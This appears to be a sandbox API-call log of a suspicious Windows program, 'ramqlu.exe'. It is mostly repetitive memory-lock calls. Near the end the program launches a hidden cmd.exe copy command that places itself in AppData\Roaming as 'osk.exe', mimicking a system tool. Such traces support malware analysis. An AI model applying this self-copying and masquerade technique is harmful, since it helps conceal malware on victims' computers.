[0051.806] GlobalUnlock (hMem=0x270004) returned 0 [0051.806] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.806] GlobalUnlock (hMem=0x27000c) returned 0 [0051.807] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.807] GlobalUnlock (hMem=0x27000c) returned 0 [0051.807] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.807] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.807] GlobalUnlock (hMem=0x27000c) returned 0 [0051.807] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.807] GlobalUnlock (hMem=0x270004) returned 0 [0051.807] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.807] GlobalUnlock (hMem=0x270004) returned 0 [0051.807] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.807] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.807] GlobalUnlock (hMem=0x270004) returned 0 [0051.808] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.808] GlobalUnlock (hMem=0x27000c) returned 0 [0051.808] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.808] GlobalUnlock (hMem=0x27000c) returned 0 [0051.808] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.808] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.808] GlobalUnlock (hMem=0x27000c) returned 0 [0051.808] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.808] GlobalUnlock (hMem=0x270004) returned 0 [0051.808] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.808] GlobalUnlock (hMem=0x270004) returned 0 [0051.808] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.808] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.809] GlobalUnlock (hMem=0x270004) returned 0 [0051.809] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.809] GlobalUnlock (hMem=0x27000c) returned 0 [0051.809] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.809] GlobalUnlock (hMem=0x27000c) returned 0 [0051.809] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.809] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.809] GlobalUnlock (hMem=0x27000c) returned 0 [0051.809] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.809] GlobalUnlock (hMem=0x270004) returned 0 [0051.809] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.809] GlobalUnlock (hMem=0x270004) returned 0 [0051.809] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.809] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.810] GlobalUnlock (hMem=0x270004) returned 0 [0051.810] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.810] GlobalUnlock (hMem=0x27000c) returned 0 [0051.810] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.810] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.810] GlobalUnlock (hMem=0x27000c) returned 0 [0051.810] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.810] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.810] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.810] GlobalUnlock (hMem=0x27000c) returned 0 [0051.810] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.810] GlobalUnlock (hMem=0x270004) returned 0 [0051.810] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.810] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.810] GlobalUnlock (hMem=0x270004) returned 0 [0051.810] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.810] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.811] GlobalUnlock (hMem=0x270004) returned 0 [0051.811] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.811] GlobalUnlock (hMem=0x27000c) returned 0 [0051.811] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.811] GlobalUnlock (hMem=0x27000c) returned 0 [0051.811] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.811] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.811] GlobalUnlock (hMem=0x27000c) returned 0 [0051.811] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.811] GlobalUnlock (hMem=0x270004) returned 0 [0051.811] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.811] GlobalUnlock (hMem=0x270004) returned 0 [0051.811] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.812] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.812] GlobalUnlock (hMem=0x270004) returned 0 [0051.812] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.812] GlobalUnlock (hMem=0x27000c) returned 0 [0051.812] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.812] GlobalUnlock (hMem=0x27000c) returned 0 [0051.812] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.812] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.812] GlobalUnlock (hMem=0x27000c) returned 0 [0051.812] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.812] GlobalUnlock (hMem=0x270004) returned 0 [0051.812] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.812] GlobalUnlock (hMem=0x270004) returned 0 [0051.812] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.813] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.813] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.813] GlobalUnlock (hMem=0x270004) returned 0 [0051.813] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.813] GlobalUnlock (hMem=0x27000c) returned 0 [0051.813] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.816] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.816] GlobalUnlock (hMem=0x27000c) returned 0 [0051.816] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.816] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.816] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.816] GlobalUnlock (hMem=0x27000c) returned 0 [0051.816] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.816] GlobalUnlock (hMem=0x270004) returned 0 [0051.816] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.816] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.816] GlobalUnlock (hMem=0x270004) returned 0 [0051.816] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.817] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.817] GlobalUnlock (hMem=0x270004) returned 0 [0051.817] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.817] GlobalUnlock (hMem=0x27000c) returned 0 [0051.817] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.817] GlobalUnlock (hMem=0x27000c) returned 0 [0051.817] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.817] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.817] GlobalUnlock (hMem=0x27000c) returned 0 [0051.817] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.817] GlobalUnlock (hMem=0x270004) returned 0 [0051.817] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.817] GlobalUnlock (hMem=0x270004) returned 0 [0051.818] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.818] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.818] GlobalUnlock (hMem=0x270004) returned 0 [0051.818] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.818] GlobalUnlock (hMem=0x27000c) returned 0 [0051.818] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.818] GlobalUnlock (hMem=0x27000c) returned 0 [0051.818] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.818] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.818] GlobalUnlock (hMem=0x27000c) returned 0 [0051.818] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.818] GlobalUnlock (hMem=0x270004) returned 0 [0051.818] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.818] GlobalUnlock (hMem=0x270004) returned 0 [0051.819] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.819] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.819] GlobalUnlock (hMem=0x270004) returned 0 [0051.819] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.819] GlobalUnlock (hMem=0x27000c) returned 0 [0051.819] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.819] GlobalUnlock (hMem=0x27000c) returned 0 [0051.819] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.819] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.819] GlobalUnlock (hMem=0x27000c) returned 0 [0051.819] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.819] GlobalUnlock (hMem=0x270004) returned 0 [0051.819] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.819] GlobalUnlock (hMem=0x270004) returned 0 [0051.820] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.820] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.820] GlobalUnlock (hMem=0x270004) returned 0 [0051.820] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.820] GlobalUnlock (hMem=0x27000c) returned 0 [0051.820] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.820] GlobalUnlock (hMem=0x27000c) returned 0 [0051.820] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.820] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.820] GlobalUnlock (hMem=0x27000c) returned 0 [0051.820] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.820] GlobalUnlock (hMem=0x270004) returned 0 [0051.820] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.820] GlobalUnlock (hMem=0x270004) returned 0 [0051.821] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.821] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.821] GlobalUnlock (hMem=0x270004) returned 0 [0051.821] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.821] GlobalUnlock (hMem=0x27000c) returned 0 [0051.821] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.821] GlobalUnlock (hMem=0x27000c) returned 0 [0051.821] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.821] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.821] GlobalUnlock (hMem=0x27000c) returned 0 [0051.821] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.821] GlobalUnlock (hMem=0x270004) returned 0 [0051.821] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.822] GlobalUnlock (hMem=0x270004) returned 0 [0051.822] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.822] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.822] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.822] GlobalUnlock (hMem=0x270004) returned 0 [0051.822] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.822] GlobalUnlock (hMem=0x27000c) returned 0 [0051.822] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.822] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.822] GlobalUnlock (hMem=0x27000c) returned 0 [0051.822] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.822] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.822] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.822] GlobalUnlock (hMem=0x27000c) returned 0 [0051.822] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.822] GlobalUnlock (hMem=0x270004) returned 0 [0051.823] SHGetMalloc (in: ppMalloc=0x18fd40 | out: ppMalloc=0x18fd40*=0x767666bc) returned 0x0 [0051.823] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=26, ppidl=0x18fd3c | out: ppidl=0x18fd3c) returned 0x0 [0055.983] SHGetPathFromIDListW (in: pidl=0x5ceb08, pszPath=0x5d7db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0055.985] SysReAllocStringLen (in: pbstr=0x18fd68*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x18fd68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0055.985] IMalloc:Free (This=0x767666bc, pv=0x5ceb08) [0055.985] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0055.985] SysReAllocStringLen (in: pbstr=0x441208*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x441208*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0055.985] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5898b8, cbMultiByte=7, lpWideCharStr=0x18ed3c, cchWideChar=2047 | out: lpWideCharStr="osk.exe\x18ㅬ疧\x18㹕疧伙]\x18") returned 7 [0055.986] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0055.988] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0055.991] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.991] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.991] GlobalUnlock (hMem=0x270004) returned 0 [0055.991] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.992] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.992] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.992] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalLock (hMem=0x270004) returned 0x5e7988 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalLock (hMem=0x270004) returned 0x5e7988 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5cf090 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalHandle (pMem=0x5cf090) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.993] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0055.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x5b0000, ftCreationTime.dwHighDateTime=0x5cf090, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6a258b, ftLastWriteTime.dwLowDateTime=0xd11a181, ftLastWriteTime.dwHighDateTime=0xcf58c75, nFileSizeHigh=0xaf51c0ef, nFileSizeLow=0x6a258b, dwReserved0=0x77c6e36c, dwReserved1=0x77cd19f7, cFileName="ﵔ\x18Ƭ[", cAlternateFileName="")) returned 0xffffffff [0055.993] GetLastError () returned 0x2 [0055.993] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc14, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0055.993] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.993] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.993] GlobalUnlock (hMem=0x27000c) returned 0 [0055.994] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.994] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.999] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.999] GlobalUnlock (hMem=0x27000c) returned 0 [0055.999] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.999] GlobalUnlock (hMem=0x270004) returned 0 [0055.999] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x57a708, cbMultiByte=18, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="/c copy /y \"@\" \"#\"\x18\x18Ő[") returned 18 [0055.999] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"@\" \"#\"", len=0x12 | out: pbstr=0x18fdc0*="/c copy /y \"@\" \"#\"") returned 1 [0055.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"@\" \"#\"", cchWideChar=18, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 18 [0055.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\" \"#\"", cchWideChar=5, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\" \"#\"py /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 5 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] SysReAllocStringLen (in: pbstr=0x18fe14*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe14*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0056.000] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"@\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0056.000] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fdc0*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", cchWideChar=65, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", lpUsedDefaultChar=0x0) returned 65 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\"", cchWideChar=1, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.001] SysReAllocStringLen (in: pbstr=0x18fe10*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe10*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0056.001] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0056.001] GlobalLock (hMem=0x270004) returned 0x5e7988 [0056.001] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0056.001] GlobalUnlock (hMem=0x270004) returned 0 [0056.001] GlobalLock (hMem=0x270004) returned 0x5e7988 [0056.001] GlobalLock (hMem=0x27000c) returned 0x5cf090 [0056.001] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0056.001] GlobalUnlock (hMem=0x270004) returned 0 [0056.001] GlobalHandle (pMem=0x5cf090) returned 0x27000c [0056.001] GlobalUnlock (hMem=0x27000c) returned 0 [0056.001] GetEnvironmentVariableA (in: lpName="COMSPEC", lpBuffer=0x18f9cc, nSize=0x400 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0056.001] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x542b38, cbMultiByte=27, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe[矆\x04") returned 27 [0056.001] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18fd90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fd80 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessInformation=0x18fd80*(hProcess=0xe4, hThread=0xe8, dwProcessId=0x534, dwThreadId=0x70c)) returned 1 [0056.727] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0057.701] CloseHandle (hObject=0xe4) returned 1 [0057.702] CloseHandle (hObject=0xe8) returned 1 [0057.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fb80 | out: lpFindFileData=0x18fb80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed1f1500, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="osk.exe", cAlternateFileName="")) returned 0x5d7fc8 [0057.702] FileTimeToLocalFileTime (in: lpFileTime=0x18fb94, lpLocalFileTime=0x18fb14 | out: lpLocalFileTime=0x18fb14) returned 1 [0057.702] FileTimeToDosDateTime (in: lpFileTime=0x18fb14, lpFatDate=0x18fb62, lpFatTime=0x18fb60 | out: lpFatDate=0x18fb62, lpFatTime=0x18fb60) returned 1 [0057.702] FindClose (in: hFindFile=0x5d7fc8 | out: hFindFile=0x5d7fc8) returned 1 [0057.702] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0057.704] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0057.704] GlobalUnlock (hMem=0x27000c) returned 0 [0057.704] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0057.704] GlobalLock (hMem=0x270004) returned 0x5cf090 [0057.704] GlobalHandle (pMem=0x5e7988) 